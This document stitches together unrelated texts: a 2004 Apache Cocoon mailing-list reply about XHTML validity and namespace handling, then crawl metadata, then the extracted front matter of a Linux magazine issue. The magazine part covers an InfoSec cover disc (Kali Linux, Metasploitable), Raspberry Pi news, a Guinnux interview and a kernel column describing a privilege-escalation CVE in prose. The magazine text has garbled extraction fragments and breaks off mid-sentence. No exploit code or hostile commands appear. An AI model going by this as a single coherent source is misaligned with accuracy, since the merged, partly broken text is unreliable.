On 01.07.2004 10:32, Colin Paul Adams wrote: >> You are really nagging on this issue, aren't you? ;-) >> > > Drip. Drip. Drip. > Look - a hollow's appeared in that stone! (no hole yet, though) :) > I checked out all the samples - since everyone of them is using the > Transitional DTD, that's not much of a test for your claim to > adherence to the strict DTD. Inspecting the source code by hand > suggests it might well be a valid claim. Do you believe me that I can configure my serializer so that it outputs the strict document type declaration? ;-) I used the w3c validator for the tests. > There are one or two of the samples do not completely validate (ignoring > the xmlns:fi issue), and the forms-gui one is nothing like (but I > think you are already well aware of that). Cocoon's part of the work were the stylesheets, not the templates - though it should also set a good example. The aggregate field template was a bit more complex and I was lazy then. For the Forms GUI sample it seems the FormsTransformer must be fixed. How I can fix the empty select element without breaking the double-listbox - I don't know. > Have you looked at all the additional comments I made to bug #29854 > yesterday? I surmise that this xmlns:fi issue is probably the same > bug (or at least, closely related to it - in any case it is produced > by the FormsTransformer). If you refer to the pure additional namespace declaration: no, it is much easier. The elements that have that namespace at the end were copied from the template into the output - and they are always copied with all their namespaces. This is a correct behaviour. To fix it you have to add a namespace clearing XSLT at the end that uses xsl:element instead of xsl:copy. > Visual inspection also shows one other thing that would be a problem > for xhtml validation, and that is method="POST" rather than > method="post". Good to know, I have not been aware of this. Maybe I should go one step further today to XHTML 1.0 strict ;-) Joerg
http://mail-archives.apache.org/mod_mbox/cocoon-dev/200407.mbox/%3C40E448F2.6070403@gmx.de%3E
CC-MAIN-2016-22
refinedweb
362
71.75
INFOSEC SPECIAL ISSUE THE ESSENTIAL MAGAZINE FOR THE GNU GENERATION •Intruder detection•Threat analytics•Malware screening MONITOR SERVERS USING MUNIN Keep tabs on networks, servers and services POWER UP YOUR PI Get more from your GPIO pins now How Erlang defines functions, atoms, tuples and more MAKE A PI GAME Code your own egg drop game with the Pi and the SenseHAT THE BEST BROWSER REVEALED Which open source browser is the best? ALSO INSIDE » Inside Guinnux » Use your Pi as a warrant canary GreatDigitalMags.com USE FUNCTIONS IN ERLANG Digital Edition ASK YOUR RETAILER Discover vulnerabilities on your machine ISSUE 174 DISC MISSING? MAKE GRAPHS WITH SHELL SCRIPTS UNDERSTAND EXPLOITS THE MAGAZINE FOR THE GNU GENERATION to issue 174 of Linux User & Developer Future Publishing Ltd Richmond House, 33 Richmond Hill Bournemouth, Dorset, BH2 6EZ +44 (0) 1202 586200 Web: ☎ This issue Editorial Editor April Madden » Lock down your system » Power up your Pi » Understand exploits » Erlang explained april.madden@futurenet.com 01202 586218 ☎ Senior Art Editor Stephen Williams Designer Rebekka Hearl Editor in Chief Dave Harfi eld Photographer James Sheppard Contributors Dan Aldred, Mike Bedford, Joey Bernard, Toni Castillo Girona, Sanne De Boer, Nate Drake, Tam Hanna, Oliver Hill, Phil King, Kushma Kumari, Jack Parsons, Swayam Prakasha, Richard Smedley, Jasmin Snook, Nitish Tiwari and Mihalis Tsoukalos Advertising Digital or printed media packs are available on request. Head of Sales Hang Deretz 01202 586442 hang.deretz@futurenet.com Account Manager Luke Biddiscombe luke.biddiscombe@futurenet.com ☎ International Linux User & Developer is available for licensing. Contact the International department to discuss partnership opportunities. Head of International Licensing Cathy Blackman +44 (0) 1202 586401 cathy.blackman@futurenet.com ☎ Subscriptions For all subscription enquiries: LUD@servicehelpline.co.uk 0844 249 0282 Overseas +44 (0)1795 418661 Head of subscriptions Sharon Todd ☎ ☎ Circulation Circulation Director Darren Pearce 01202 586200 ☎ Production Production Director Jane Hawkins 01202 586200 ☎ Look for issue 17b5 on 9 Fe er? Want it soon e Subscrib ! y a tod Management Finance & Operations Director Marco Peroni Creative Director Aaron Asadi Editorial Director Ross Andrews Printing & Distribution ☎ Distributed in Australia by Gordon & Gotch Australia Pty Ltd, 26 Rodborough Road, Frenchs Forest, New South Wales 2086 + 61 2 9972 8800 ☎ Welcome to the latest issue of Linux User & Developer, the UK and America’s favourite Linux and open source magazine. We all worry about security. As Linux users we have less chance of our personal machine being coopted into a botnet, but that doesn’t mean that if it picks something up it can’t merrily forward it on to its Windowsbased brethren. Then there are the risks inherent to networks and to the Internet of Things, many based on Linux but made up of mixed architectures. We can’t rely on Windows, Android or even Apple devices to look after themselves; we know how easy it can be to circumvent their protections. Only Linux offers the degree of lockdown and the testing tools we need to achieve a reasonable level of security for our machines, networks and data. We take an in-depth look at these tools and at pro techniques for using them on p18, and you’ll also find them on the disc that accompanies the magazine (digital edition readers can find them on our FileSilo repo). Meanwhile on p58 we’ll show you how to power up your Pi with some clever interfacing and electronic tricks. You’ll learn how to get more from your GPIO pins and how to work around power limits safely to supercharge your Pi projects. Plus the rest of the issue is packed with tutorials on security, programming, admin and more. Enjoy the issue! April Madden, Editor Disclaimer The publisher cannot accept responsibility for any unsolicited material lost or damaged in the post. All text and layout is the copyright of Future ISSN 2041-3270 Get in touch with the team: linuxuser@imagine-publishing.co.uk Facebook: Linux User & Developer Twitter: Buy online @linuxusermag Visit us online for more news, opinion, tutorials and reviews: 3 Contents e Subscrib! e v & sa r 32 t ou Check ou fer! of great new ers om US cust ibe cr can subs on page 56 Reviews 81 Web browsers Is Chrome still the cream of the crop when it comes to web browsing? 18 Lock down your system Master InfoSec skills to secure and test systems and networks Midori Chrome Firefox QupZilla OpenSource Tutorials 08 News The biggest stories from the open source world 12 Interview John Eigelaar on the Guinnux distro 16 Kernel column The latest on the Linux kernel with Jon Masters 34 Bash masterclass: Combine shell scripts and charts Transform your textual information into attractive diagrams with gnuplot and Bash 38 Analyse, adjust and run exploits in a controlled environment Learn how exploits work and how you can use this knowledge against them 42 Monitor your network with Munin Learn how to install and configure Munin on a Linux system to monitor networks 46 Program in Erlang: Functions 86 Solwise PL-1200AV2-PIGGY Does this Powerline adaptor give you the internet speeds it promises? 88 Fedora 25 Can Fedora’s latest update turn the tables on the competition? 90 Free software Richard Smedley recommends some excellent FOSS packages for you to try Discover Erlang functions and basic Erlang data types 52 Manage user accounts in Ubuntu Learn how to effectively manage user accounts, permissions, groups and more Features 18 Lock down your system 57 Practical Raspberry Pi Learn and apply essential InfoSec techniques 58 Secrets of Pi interfacing 96 Free downloads Get more from your GPIO pins and power up your Pi Find out what we’ve uploaded to our secure repo FileSilo for you this month Learn how to get more from your GPIO pins, build a Pi air drum, code an egg-drop game, set your Pi up as a tweeting warrant canary and set up a Pi photo frame Join us online for more Linux news, opinion and reviews 4 DOMAINS | MAIL | HOSTING | eCOMMERCE | SERVERS STOP SHARING! 1&1 VIRTUAL SERVER CLOUD from 99 4. £ /month* excl. 20% VAT Trusted Performance. Intel® Xeon® processors. NEW 1&1 eliminates the "noisy neighbour effect": Ideal for beginners as a web and mail server, but also for more demanding projects like database applications, the new 1&1 Virtual Server Cloud is 100% yours to use! Take advantage now of the latest cloud technology. No shared resources through VMware virtualisation ■ Full root access ■ SSD storage ■ Unlimited traffic ■ High performance Maximum security ■ Best price-performance ratio ■ 24/7 expert support ■ Choice between Linux/Windows ■ Plesk ONYX ■ 1 CALL SPEAK TO AN EXPERT 1 CLICK UPGRADE OR DOWNGRADE ■ 1 CERTAINTY FAIL SAFE 0333 336 5509 * 1&1 Virtual Server Cloud S: £4.99/month. Billing cycle 1 month. Minimum contract term 12 months. No setup fee. Following the offer period, subsequent periods will be charged at the renewal price. Prices exclude 20% VAT. Visit 1and1.co.uk for full product details, terms and conditions. Windows® and the Windows® logo are registered trademarks of Microsoft ® Corporation in the United States and/or other countries. 1&1 Internet Limited, Discovery House, 154 Southgate Street, Gloucester, GL1 2EX. 1and1.co.uk Open Source On the disc On your free DVD this issue Find out what’s on your free disc Welcome to the Linux User & Developer DVD. This issue we’re all about InfoSec as we help you to test your security, lock down your systems and networks, and even explore a deliberately vulnerable VM to learn more about threats and how to counter them. Inside our live booting distros you’ll also be able to access all the FOSS from our InfoSec feature and keep your systems and data completely watertight. Featured software: Kali Linux The ultimate security testing distro for Linux users will help you to make your system and network watertight. Use it to access the software in our InfoSec feature and to test your systems and networks for the ultimate in secure computing. Please note that the default login for the live boot edition of Kali Linux is username: root; password: toor. IPFire A professional and hardened Linux firewall distribution that is secure, easy to operate and has great functionality. Please note that you will need to install IPFire from the live booting disc, so ensure that you have backed up all of your data and partitioned your drive before installing, to avoid losing any of your information or partitions. Load DVD To access software and tutorial files, simply insert the disc into your computer and double-click the icon. Live boot To live-boot into the distros supplied on this disc, insert the disc into your disc drive and reboot your computer. Please note: • You will need to ensure that your computer is set up to boot from disc (press F9 on your computer’s BIOS screen to change Boot Options). • Some computers require you to press a key to enable booting from disc – check your manual or the manufacturer’s website to find out if this is the case on your PC. • Live-booting distros are read from the disc: they will not be installed permanently on your computer unless you choose to do so. For best results: This disc has been optimised for modern browsers capable of rendering recent updates to the HTML and CSS standards. So to get the best experience we recommend you use: • Internet Explorer 8 or higher • Firefox 3 or higher • Safari 4 or higher • Chrome 5 or higher Problems with the disc? Metasploitable Metasploitable is an intentionally vulnerable Linux virtual machine. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. As it is deliberately insecure, please make sure that you don’t store any of your sensitive or personal data on a partition or VM running Metaspoitable. 6 Send us an email at linuxuser@ imagine-publishing.co.uk Please note however that if you are having problems using the programs or resources provided, then please contact the relevant software companies. Disclaimer Important information Check this before installing or using the disc For the purpose of this disclaimer statement the phrase ‘this disc’ refers to all software and resources supplied on the disc as well as the physical disc itself. You must agree to the following terms and conditions before using this ‘this disc’: Loss of data In no event will Future Publishing accept liability or be held responsible for any damage, disruption and/or loss to data or computer systems as a result of using ‘this disc’. Future Publishing makes every effort to ensure that ‘this disc’ is delivered to you free from viruses and spyware. We do still strongly recommend that you run a virus checker over ‘this disc’ before use and that you have an upto-date backup of your hard drive before using ‘this disc’. Hyperlinks: Future Publishing does not accept any liability for content that may appear as a result of visiting hyperlinks published in ‘this disc’. At the time of production, all hyperlinks on ‘this disc’ linked to the desired destination. Future Publishing cannot guarantee that at the time of use these hyperlinks direct to that same intended content as Future Publishing has no control over the content delivered on any of these hyperlinks. Software Licensing Software is licensed under different terms; please check that you know which one a program uses before you install it. Live boot Distros Insert the disc into your computer and reboot. You will need to make sure that your computer is set up to boot from disc FOSS Free and open-source software needs to be installed via the distros or by using the disc interface Distros can be live booted so that you can try a new operating system instantly without making permanent changes to your computer Explore Alternatively you can insert and run the disc to explore the interface and content • Shareware: If you continue to use the program you should register it with the author • Freeware: You can use the program free of charge • Trials/Demos: These are either time-limited or have some functions/features disabled • Open source/GPL: Free to use, but for more details please visit gpl-license Unless otherwise stated you do not have permission to duplicate and distribute ‘this disc’. 7 08 News & Opinion | 12 Interview | 96 FileSilo RASPBERRY PI Raspberry Pi gets a serious speed boost Connectivity improvements could usher in a new wave of IoT developments We all know that the Raspberry Pi has long been heralded as the best single board computer made for public use, partially due to the continuous updates that have been implemented into it and its wallet-friendly price tag. One of the caveats, however, has long been its reliance on Wi-Fi connectivity, a specific problem for those looking to start developing for the Internet of Things. However, in a recent update, it has been announced that Raspberry Pi 3 owners will soon even be able to take full advantage of LTE connectivity on their units. It will soon be able to handle low-throughput cellular communications, a massive boost for development practices. Developing the chipset is Altair Semiconductor, previously known for its Raspberry Pi 3 owners will soon even be able to take full advantage of LTE connectivity 8 developments in LTE chipsets, many of which have been implemented into everyday items. “We are dedicated to providing low-cost, highperformance computers to connect people, enable them to learn, solve problems and have fun,” said.” Due to the limitations involved with Wi-Fi networks, the addition of Altair’s LTE chipset should help provide wider and more flexible coverage. When implemented correctly, users will be able to stream high-definition video from anywhere, while also establishing connections with other applications and home automation products. The new chipset features downlink speeds of up to 10Mbps and offers extremely low power consumption, which blends in well with the Pi’s low-resource demands. It’s also completely software upgradable, with updates expected to help bridge the connection between Above LTE connectivity will soon be a major part of the Pi Pi and IoT devices even further. Also touted to be showcased in the chipset will be an advanced power management unit, a low power CPU subsystem and integrated DDR memory with a strong security framework. now been sold to date, and we’re pleased to debut this proof-of-concept to extend its range and value.” The integration of the chipset is said to be a gradual process, but if history is anything to go by, we can expect all units to be shipping with this option readily available in the first half of 2017. It’s likely we’ll also see the development of LTE brought forwards into all future models of the Raspberry Pi. If you’re not one of the 10 million owners of a Pi unit, you can head across to for all pricing and shopping options. TOP FIVE Best distros for ethical hacking practices 1 Kali Linux Although it flies under the radar, Kali Linux comes with over 600+ pre-installed pen testing tools that majorly enhance your security toolbox. Tools are highly flexible and many are being updated regularly. Best of all, they can be easily implemented into different platforms, including both ARM and VMware. DEVELOPMENT Compiling code just got easier 2 Pentoo Linux Based on Gentoo, Pentoo can be cleverly used on top of any existing Gentoo installation. Its array of tools vary from exploits to database scanners, equipping you with everything you need to put your security to the test. The Red Hat Developer Toolset gets a major update Getting that combination of stable operating system with the latest developmental tools is never an easy feat, so it’s testament to Red Hat’s endeavours that its Developer Toolset is reaching its sixth major update. For those unaware, the Red Hat Developer Toolset’s primary aim is to help streamline application development by enabling developers to get hands on with the latest open-source C++ and C compilers profiling tools. Through these tools, developers can then compile applications and deploy them across multiple versions of Red Hat Enterprise Linux. A key part of this sixth update is its expansion into even more architectures. These include Red Hat Enterprise Linux on x86 systems, RHEL for z systems and the ARM Developer Preview of RHEL as well. Avid users will find new tools and updates to take advantage of that form the basis of the Developer Toolset and subsequent Red Hat Software Collection. The likes of PHP, Python, Ruby and MongoDB have all seen significant updates, while Git 2.9, the open-source version control system, makes its debut in the toolset. Other new additions include the appearance of the Redis 3.2 and MySQL 5.7 open-source databases, as well as a new JVM monitoring tool in Thermostat 16. Eagle-eyed users will also find included the latest stable version of Eclipse Neon, an ideal solution for those interested in the latest tools within the Eclipse integrated development environment. Toolset-specific updates are also in abundance in order to really take this toolkit above and beyond what the competition offers. Both the GNU Compiler Collection and GNU Project Debugger have been updated to their latest versions, while numerous toolchain components and performance tools, namely Dyninst and Valgrind, have both been enhanced. In its current state, the toolset is available to all members of the Red Hat Developer Program, as well as those who currently have a select RHEL subscription. Later this year, a free RHEL developer subscription will also be included to those who have yet to make the plunge, but at the time of writing, it’s unknown what sort of terms this will be available under. 3 Parrot Security OS One of the best things about Parrot is just how lightweight it is, making it a viable choice for those running old or slow hardware. It doesn’t skimp on features, however, and you’re bound to find every penetration tool you could possibly need. 4 DEFT Linux As far as digital forensics go, you can’t look past DEFT Linux. It comes with a staggering amount of forensic tools, which are particularly tailored for penetration testers. It’s also based on Ubuntu, which helps in its customisation. 5 Caine Caine is the best on this list when it comes to combining everyday distro applications, such as a browser and email client, with a highly complex forensic suite. It performs both functions well and can be run from either live or hard disk. 9 OpenSource Your source of Linux news & views STEAMOS SteamOS 2.97 fixes Steam Controller compatibility woes This latest updates provide essential bug fixes for gamers Valve has recently launched the stable SteamOS 2.97 maintenance update, almost five months since its previous release, SteamOS 2.87. Behind the scenes, SteamOS is still in the development phase when it comes to being synchronised with the Debian stable repositories, but the latest 2.97 update bridges the gap further with the inclusion of BIND9, cURL and GStreamer Bad Plugins 1.0. Having both SteamOS and Debian in full sync will help guarantee that the gaming client will receive the newest security fixes that are also being implemented in the Debian operating system at the same time. In recent updates, Linux forums have been rife with compatibility issues regarding the Steam Controller, but new additions should help Full sync will help guarantee that the gaming client will receive the newest security fixes Above The Steam Controller now works flawlessly in SteamOS put the issue to rest. A newly implemented X.Org server now ignores joystick devices, which in turn prevents controller and mouse inputs being confused for one another. Initial public feedback has shown this to be a big help for those suffering from the issue found in the previous beta clients. Under the hood, SteamOS 2.97 ships with an array of security updates for the libxslt, tsdata and GNU Tar packages, providing each with the latest in fixes and plugs. Lastly, firmware-ralink packages have been re-introduced, which has helped the unattended upgrade functionality flourish once again. It was a sorely missed feature in previous beta updates, so we’re glad to see it back in action. Valve has gone on record to say that it highly recommends users update their SteamOS client to the latest 2.97 version as soon as possible. Those looking to update should head across to the Steam Universe group over at steamcommunity.com for all necessary installation images. OPEN SOURCE Microsoft and Google make open source commitments Although in recent months Microsoft has upped its game when it comes to supporting the world of open source, and to some degree Linux, it’s come to pass that it’s now officially the latest high-profile member of the Linux Foundation. Despite its long history in closedsource software, members of Microsoft have gone on record to say that the partnership will help the Redmond giant develop and deliver new mobile and cloud experiences to more people than ever before. Microsoft has recently been praised for publishing source code repositories, a big step up from a few years ago, but even more impressive is its work when collaborating with the open source community. Recently it has been seeking community consensus in many key development projects, with consumer feedback helping to shape their open-source future. Just as surprising to some will be the announcement of Google joining the .NET Foundation as part of the ever-increasing Even more impressive is its work when collaborating with the open source community 10 Steering Group. Despite Google’s interests in Java, the move is seen as a way for it to help improve .NET support for its own Google Cloud platform. Going forward, it’s unknown how Google will be able to help move .NET forward with its plans, especially when it comes to Google’s investments in the heavily Java-based Android platform. Could we expect to see Visual Studio make it over to Android at some point? Who knows… Both Microsoft and Google’s announcements may come as a surprise, but it’s testament to the developments in the open-source community that have helped pave the way for these mergers to take place. HARDWARE Western Digital unveils Picompatible hard drive range Storage options are plentiful for Pi users around the world Western Digital has long been a pioneer in making storage more accessible for users all over the world. Its latest announcement sees the introduction of a new kit to help equip your Raspberry Pi with a hard drive storage solution. Named the WD PiDrive Foundation Edition, the hard drive comes equipped with a complete custom software build, closely based on the Raspbian OS and NOOBS OS installer. For end users, this combination provides a quick and simple installation of Raspbian PIXEL and Raspbian Lite onto the drive itself. The drive is to be offered in three capacity versions: a 64GB flash drive, a 250GB disk drive and 375GB disk drive. Both of the bigger capacity options will include a WD PiDrive cable, a unique cable that provides an optimal powering option for both the hard drive and Raspberry Pi simultaneously. Due to the increased space of a hard drive over a microSD card, the traditional storage option Top 10 (Average hits per day, 15 Nov– 15 Dec) 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. Linux Mint openSUSE Debian Zorin Ubuntu Fedora Manjaro Elementary Deepin Antergos 2,629 1,708 1,707 1,374 1,324 1,298 1,271 881 862 806 This month ■ Stable releases (19) ■ In development (9) for Pi users, WD has implemented an exclusive feature called Project Spaces. This allows for the installation of up to five core operating systems, partitioning areas of the hard drive off for each one, and empowering Pi users with a vast array of choices. Versions of the WD PiDrive start at just $18.99 over at the official site. PROGRAMMING Node.js Foundation implements new security project The popular open-source application programming framework continues to grow In an attempt to consolidate and improve overall security levels in its ever-popular opensource programming framework, Node.js has implemented its own Node.js Security Project into the mix. The Node.js Security Project was initially set up to help collect information about vulnerabilities that Node users most commonly face. As a direct part of the Node.js Foundation, it’ll be used to help plug exploits and identify core weaknesses within the framework. Another major role of the Node.js Security Project is to help manage the module ecosystem DISTRO FEED that the framework has been famed for. Over the past 12 months, the module system has nearly quadrupled in size, and as with any developments of this kind, security needs to be paramount. Forums have been rife with bugs, so this additional security layer could prove to be a game changer. It’s expected that the merge will be taking place over a certain amount of time and on a gradual basis, with security protocols being implemented throughout the framework and introduced to users fairly quickly. The release of Fedora 25 has helped spark some major interest back into the distribution, with it gaining a new wave of users and enticing back those who had previously deserted it. Highlights elementary OS Despite the 0.4 Loki update being released over five months ago now, new users are still flocking over to elementary OS. Its combination of strong usability mixed in with great design is proving to be hard to match. Mint The 18.1 beta of Linux Mint has helped it maintain its spot at the top of the download list. Its biggest addition is a new screensaver with built-in playback controls; it’s pretty good! Fedora It’s hard not to be impressed with what Fedora have achieved with the 25th update. Workstation in particular is fast becoming one of the premier distributions for new and seasoned users alike. Latest distros available: filesilo.co.uk 11 OpenSource Your source of Linux news & views INTERVIEW JOHN EIGELAAR A new face for Arch Guinnux makes Arch Linux woes a thing of the past. Founder John Eigelaar details how his revolutionary distribution took shape John Eigelaar is the founder and director of Keystone Electronic Solutions. Based in South Africa, he’s at the forefront of the Guinnux distribution, as well as a series of Guinnux-based hardware. How long has Guinnux been in development for? Where did the original idea for it come from? Guinnux started in 2010 as a buildroot project. We soon realised the similarities between embedded installations and Linux server deployment in terms of their requirements and that it needed to be predominantly unattended. On top of that, we aimed to help promote a structured development environment. That’s where many of Guinnux’s aims were created. Furthermore, buildroot was not flexible enough to move away from uClibc and to deploy new solutions on top of existing frameworks. Deploying 12 new images instead of staged updates to sites is not viable when you have hundreds and thousands of sites. As you can imagine, keeping all of this development and the runtime environment in sync ended up becoming a full-time job. Since then, we’ve been able to enhance and build upon the principles that Guinnux was based on to the project and distribution you see today. For our readers who may be unaware of the Guinnux distribution, could you give us an overview of what it is and its key features? Keystone Electronic Solutions’ enterprise embedded Linux – dubbed Guinnux – is based on Arch Linux ARM. It is developed and maintained by us and makes it easy to construct custom packages and solutions. It adopts the Arch Linux way of doing things, but with much-needed extras. Don’t get me wrong, there’s a lot of great things about Arch Linux, but it can be overly complicated when it really doesn’t need to be. So it was our aim to make it more accessible and considerably expand on its feature set. The Guinnux rescue file system allows users to boot into flash should the embedded system fail, and allows for simple system recovery – we’ve had a lot of positive feedback about this so far. The system can be recovered without having to reflash an image – a useful addition that saves more than just time! In fact, it is essential for enterprise deployments to recover and more surprisingly, it’s a feature that is often left out of many other enterprise-based distributions. Other features myself and the team have been working on include adapting the boot loader so users are able to boot kernels from any external file system. This allows for Keystone to distribute and upgrade kernel packages from anywhere and at any time, without interrupting service. Users can also find a ton of extra information about Guinnux over on our official Wiki page: doku.php. What makes Guinnux truly unique compared to other embedded Linux distributions? Guinnux is the first embedded GNU/Linux distribution that emulates the proven workflow of Enterprise Linux solutions. We’ve looked to blend all that is great with enterprise distributions – of which there’s a lot – with the core stabilities and improvements that we’ve introduced in Guinnux. Users will also find Guinnux as a headless enterprise embedded Linux distribution, but [it] still provides a mature and stable development environment for all our users. We’ve also looked to offer a comprehensive networking and protocol compatibility suite, something that many of our Getting acquainted with the Guinnux Starter Kit The Guinnux Starter Kit aims to be a one-stop shop for everything you could possibly need to start developing with Guinnux. It serves as an entry point for the evaluation of both the runtime and development environments that Guinnux offers its users. The kit itself consists of a ARM9-based development board, a 5V external power supply and a microSD card for use with the board. This development board includes a number of IO interfaces, such as RS232 Serial, USB 1.1 Host, 10MB LAN and room for a IO expansion connector as well. Other specifications include 64MB SDRAM and battery backed RTC. The latest version of Guinnux comes pre-programmed onto the board, with the accompanying ext4 root file system booted and loaded onto the microSD card. Extra binary and system images are available for download from the official Guinnux site. By standard, the root file system contains every single core utility to remotely access and customise the Guinnux development board, so expect to things like the OPKG Package Manager and the openSSH server among others. Interested parties can get their hands on the Guinnux Start Kit over at. 13 OpenSource Your source of Linux news & views competitors are traditionally slow at undertaking. Away from that, Guinnux also provides built-in system recovery and failsafe mechanisms as standard, as well as OTA updates with minimal downtime. For newer users, we’ve also made sure Guinnux works instantly out of the box, providing hassle-free deployment and a pre-installed standard web-based configuration interface. Our final standout option is the pacman package management system, which combines a simple binary package format with an easy-to-use build system. The goal of pacman is to make it possible to easily manage packages, whether they are from the official repositories or the user’s own package builds. How much of the distribution is core Arch Linux? Has there been a lot of modifications to it? Almost all of it is core Arch. We tied the core components together to allow for the development of enterprise solutions on top of the Arch Linux system. Our main focus was to allow more applications to be deployed onto the core. We added components that are expected from embedded distributions, such as a web config site and modules/libraries 14 Bringing Guinnux to the Pi One of the most interesting things that have come from the development of Guinnux is that it now works with a number of third-party boards. While there’s a lot of interest in porting Guinnux across to the Beagle Bone Black board, most users will want to familiarise themselves with the distribution on the Raspberry Pi. The availability of Guinnux on the Pi is done through a NOOBS OS image, but with a twist. Unlike other NOOBS images, Guinnux first installs the fall back rescue system, which in turn is then used to download and install the base Guinnux packages. For end users, this keeps download and install times to an absolute minimum. Of course, users also have the option to download the NOOBS image directly onto an SD card and install Guinnux that way, but the process is vastly more complicated. Once the Guinnux and Pi partnership is complete, users can then get stuck into a full configuration web interface, which can be tailored to meet your exact needs, and help optimise what the Pi can handle. to control embedded hardware. As I mentioned previously, Arch can be a tricky distribution to get your head around, so we wanted to make it a more appealing proposition to potential new users. We’d like to think we’ve made a good job of that. We heard that your team made some changes to the Build tool within Arch Linux. What sort of changes were these? We made the makepkg utility (among others) cross-compile compatible. This differs from the usual approach of performing clustered builds. The produced packages are also seamlessly integrated into the toolchain through a modified pacman utility, such that one manages their toolchain as they would manage a normal distribution. Your site also shows some Guinnux-based hardware, are these good choices for both We’re always looking at new ways we can entice new users to potentially try out Guinnux new and advanced Linux users? Are they more relevant to companies or makers? Guinnux is well suited to our own Blue Penguin board as this was the main development platform for Guinnux. The Blue Penguin module is field-tested and is used in multiple enterprise solutions. They are perfect for companies who want to produce a serious industrial-strength embedded platform. However, we also recognise that there is a market for makers, and that is why we ported Guinnux to the Raspberry Pi and we are currently also porting it to the Beagle Bone Black board. We’re always looking at new ways we can entice new users to potentially try out Guinnux, so being able to implement into other boards is a big part of that. Hopefully we can continue to port it across to other avenues in the near future. What do you see as the future of Guinnux going forward? How active do you think the development cycle will be? Guinnux will continue to keep up with the mainstream Linux distributions to keep the embedded environment close to the PC environment. This greatly improves the development experience. Releases are planned to occur annually, depending on the changes we feel need to be implemented at the time. We are constantly adding features as we require them, and we welcome the Linux community to join in development over on our website and forums. 15 OpenSource Your source of Linux news & views OPINION The kernel column Jon Masters summarises the latest happenings in the Linux kernel community Jon Masters is a Linux-kernel hacker who has been working on Linux for some 19 years, since he first attended university at the age of 13. Jon lives in Cambridge, Massachusetts, and works for a large enterprise Linux vendor, where he is driving the creation of standards for energy efficient ARM-powered servers 16 Linus Torvalds announced the release of the 4.9 Linux kernel, noting that it “is the biggest release we’ve ever had, at least in number of commits.” In fact, the numbers aren’t even close. With over 16,000 changesets (3,000 more than the previous cycle), Linux 4.9 is the biggest kernel in some time. Each of those changesets represents a group of patches, many of which will have had a number of iterations and reviews during development. All of which well explains why Linus decided to wait an extra week after a (rare) RC8 before pushing the final kernel out the door. The latest kernel includes a number of new features that we have covered in previous issues, including support for Intel’s Memory Protection Keys, and Andy Lutomirski’s work on Virtually Mapped Kernel Stacks. The latter will increase resiliency in the kernel against a number of corner case problems, such as overflowing the (fixed size) kernel stack with extremely rare code paths, or some of the more obscure forms of security compromise. In fact, CONFIG_VMAP has already lead to a number of additional cleanups, including better support for virtual address debug, and the identification of a longstanding bug in the kernel’s handling of old fashioned 32-bit only x86 processors during processor exceptions. Meanwhile, Intel’s Memory Protection Keys aim to guard against certain forms of buffer overflow and other security problems, while also providing a means to isolate certain sensitive memory regions (such as those containing private keys used for cryptography). Other features in 4.9 include the usual raft of driver updates, including support for the greybus subsystem as used by the (discontinued) Google Ara project that we have covered previously as well. Finally, a hardware latency detector originally hacked together many years ago by this author (since rewritten more cleanly by another) to diagnose problems with real time Linux systems has finally been merged (see the new hwlat tracer). Linus originally had intended for the 4.9 kernel to be released a week earlier, but by 4.9-rc6 he was hinting at a potential delay. This was confirmed when he added an (unusual) 4.9-rc8, noting that things had not yet calmed down enough for him to be confident in a final release. All of this means that timing for Linux 4.10 will be awkward to say the least, with the merge window closing on Christmas Day. Linus did note, however, that this is “a pure technicality, because I will certainly stop pulling on the 23rd at the latest, and if I get roped into Christmas food prep, even that date might be questionable.” More security exploits Three more critical security issues affecting the Linux kernel have been announced over the past month. The most serious of these was CVE-2016-8655, ‘Linux af_packet.c race condition (local root)’, in which a carefully crafted sequence of software calls into the unprivileged namespaces code (used by containers on many distributions) could be used to cause the kernel to perform a “use after free” type access to memory under the control of the attacker, and thus cause escalation of privilege to that of the root user. The original discovery of this problem was reported by Philip Pettersson, who noted that he “found the bug by reading code paths that have been opened up by the emergence of unprivileged namespaces, something I think should be off by default in all Linux distributions.” Many of these namespace changes have been made in the interest of supporting Linux containers, but some of these changes have broken previous assumptions that particular operations were privileged, and thus perhaps less subject to the kind of code audit that Philip has undertaken here. On the face of it, we seem to be experiencing a wave of security bugs affecting the Linux kernel these days. But in part, this is because such exploits now often come with memorable, cute sounding names, blogs, Twitter handles, and corporate PR teams keen to promote their service of discovering the problem to begin with. This drives greater attention to security (which isn’t necessarily a bad thing). At the same time, Linux is now an incredibly enticing target for those up to mischief (or just out for a PR opportunity). In many ways, there is more to be gained from compromising Linux than there is in compromising Windows or Mac OS, in terms of high value targets. Heterogeneous memory management One of the more interesting trends in hardware is toward sharing memory between devices and system applications processors (CPUs) in more homogenous and transparent ways. The utopia that we are all hoping will come soon is in the form of coherently attached devices that participate in system-wide cache coherency protocols and become instantly aware of any changes made to memory by any other agent or processor within the machine. When we reach this eventual stage of evolution, it will (theoretically) be possible to build software abstractions that treat code running on GPUs, FPGAs, and other accelerators attached to a machine as if they’re regular processes. But we’re a little way away from utopia today. Until quite recently, data shared between GPUs (as an example) and system RAM had to be quite explicitly managed, with many extraneous copies of large areas (buffers) of memory as they were passed back and forth. Some of the latest hardware on the market greatly improves the status quo. For example, Nvidia’s Pascal GP100 supports the ability to trigger page faults in unified memory shared between the GPU and system. This means that the kernel can maintain a consistent mechanism to manage memory, whether it is system RAM or device graphics memory, using the standard page table abstraction to translate from the virtual addresses used by software (applications on the host Linux system, and code running on the GPU) to underlying physical memory that might be located in RAM, or on the GPU. Because devices like the GP100 can trap on a fault, they can allow the kernel to manage and coordinate ownership behind the scenes. This is a feature that is leveraged by the HMM (Heterogenous Memory Management) patch series from Jérôme Glisse to provide a generic kernel mechanism. The code has been under development for several years (since at least 2014) but there was some resistance to merging it before the upstream maintainers could see real-world hardware use cases involving it. There are now several devices shipping that can leverage HMM, including both the Nvidia Pascal, as well as the Mellanox CX5 network adapter cards. The latest version of the patch series (v14) seems to be very close to a final form. The question is whether the presence of shipping hardware, and the endorsements of those building it, will allow this now to be finally merged. The future of third-party driver support Linux is famous in developer circles for several fundamental tenets. One of these is that “you don’t break userspace”. Another is that “there is no kernel ABI”. The latter means that, unlike other proprietary (and some other open source) Operating Systems, Linux doesn’t guarantee stable internal interfaces between the components inside the kernel (as opposed to those visible to applications). This is the reason that those who use proprietary graphics drivers on Linux must update them every time a new upstream kernel is released, for example. The kernel doesn’t guarantee that the interfaces needed for drivers won’t change radically from one release to the next. Any such changes are typically viewed as being self-contained and impacted code is usually updated whenever other infrastructure changes are made within the Linux kernel source. Yet for many years, a compromise situation has existed in which a Linux kernel could be 